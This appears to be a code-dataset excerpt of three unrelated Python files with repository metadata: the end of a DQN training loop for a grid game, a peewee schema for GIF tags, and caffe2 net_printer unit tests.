cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3),
dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[
self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[
self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[
self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(
env, 'RGB'
) # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
ep_rewards = [-200]
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
if not os.path.isdir('models'):
os.makedirs('models')
#Make agent interact with the environment
agent = DQNAgent()
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
agent.tensorboard.step = episode
episode_reward = 0
step = 1
current_state = env.reset()
done = False
while not done:
if np.random.random() > epsilon:
action = np.argmax(agent.get_qs(current_state))
else:
action = np.random.randint(
0, env.ACTION_SPACE_SIZE
) #take random action eith epsilon probability
new_state, reward, done = env.step(action)
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
agent.update_replay_memory(
(current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:]) / len(
ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward,
reward_min=min_reward,
reward_max=max_reward,
epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= MIN_REWARD:
agent.model.save(
f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model'
)
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
| [
"yashch.1210@gmail.com"
] | yashch.1210@gmail.com |
3a3c9cb0ae78a1a9de92c0c133fac3c98c5997ff | 443c5305b7df00dff9a7f89906fbb362be3bb334 | /db.py | abc2ad94000afc1a22ce8b71e858ba0c6016a866 | [] | no_license | oliverh100/giphyClone | 30feab387ee97b6dc84c67ca6b615a468fc9d7e1 | 36570b97e66e71af11e29fcf423e08ddbb2c0dfc | refs/heads/master | 2022-12-09T07:24:54.150254 | 2019-06-28T15:11:39 | 2019-06-28T15:11:39 | 193,688,589 | 0 | 0 | null | 2022-12-03T22:27:05 | 2019-06-25T10:42:50 | Python | UTF-8 | Python | false | false | 568 | py | from peewee import *
db = SqliteDatabase('static/gifs.db')
class gif(Model):
filename = CharField()
class Meta:
database = db
db_table = 'gif2'
defered_link = DeferredThroughModel()
class tags(Model):
tag = CharField()
gifs = ManyToManyField(gif, backref='tags', through_model=defered_link)
class Meta:
database = db
db_table = 'tags2'
class link(Model):
gif = ForeignKeyField(gif, backref = 'tag_links')
tag = ForeignKeyField(tags, backref = 'gif_links')
class Meta:
database = db
db_table = 'link'
defered_link.set_model(link)
| [
"oliverh100@gmail.com"
] | oliverh100@gmail.com |
3642d4130b2a6948154873329d6f8ed1f4a69df7 | 4f408d65db60911f56110c351cb3b64835e0c5fb | /caffe2/python/net_printer_test.py | 2d6f5a172326cc0d170bb65254e0db72b09f873c | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | KeyKy/caffe2_SSD | a02c065aef2dbcfd00faae8be0440d7a4ff0fb76 | 7235688ea5e212dbe8609d780dd94c8c7d9fef54 | refs/heads/master | 2021-09-18T14:36:11.247427 | 2018-07-10T09:59:35 | 2018-07-10T09:59:35 | 89,928,918 | 8 | 5 | null | 2018-07-27T02:14:38 | 2017-05-01T14:04:20 | Jupyter Notebook | UTF-8 | Python | false | false | 2,901 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
with Task():
total = ops.Const(0)
total_large = ops.Const(0)
total_small = ops.Const(0)
total_tiny = ops.Const(0)
with ops.loop(10) as loop:
outer = ops.Mul([loop.iter(), ops.Const(10)])
with ops.loop(loop.iter()) as inner:
val = ops.Add([outer, inner.iter()])
with ops.If(ops.GE([val, ops.Const(80)])) as c:
ops.Add([total_large, val], [total_large])
with c.Elif(ops.GE([val, ops.Const(50)])) as c:
ops.Add([total_small, val], [total_small])
with c.Else():
ops.Add([total_tiny, val], [total_tiny])
ops.Add([total, val], total)
def example_task():
with Task():
with ops.task_init():
one = ops.Const(1)
two = ops.Add([one, one])
with ops.task_init():
three = ops.Const(3)
accum = ops.Add([two, three])
# here, accum should be 5
with ops.task_exit():
# here, accum should be 6, since this executes after lines below
seven_1 = ops.Add([accum, one])
six = ops.Add([accum, one])
ops.Add([accum, one], [accum])
seven_2 = ops.Add([accum, one])
o6 = final_output(six)
o7_1 = final_output(seven_1)
o7_2 = final_output(seven_2)
return o6, o7_1, o7_2
def example_job():
with Job() as job:
with job.init_group:
example_loop()
example_task()
return job
class TestNetPrinter(unittest.TestCase):
def test_print(self):
self.assertTrue(len(net_printer.to_string(example_job())) > 0)
def test_valid_job(self):
job = example_job()
with job:
with Task():
# distributed_ctx_init_* ignored by analyzer
ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
net_printer.analyze(example_job())
def test_undefined_blob(self):
job = example_job()
with job:
with Task():
ops.Add(['a', 'b'])
with self.assertRaises(AssertionError):
net_printer.analyze(job)
def test_multiple_definition(self):
job = example_job()
with job:
with Task():
ops.Add([ops.Const(0), ops.Const(1)], 'out1')
with Task():
ops.Add([ops.Const(2), ops.Const(3)], 'out1')
with self.assertRaises(AssertionError):
net_printer.analyze(job)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.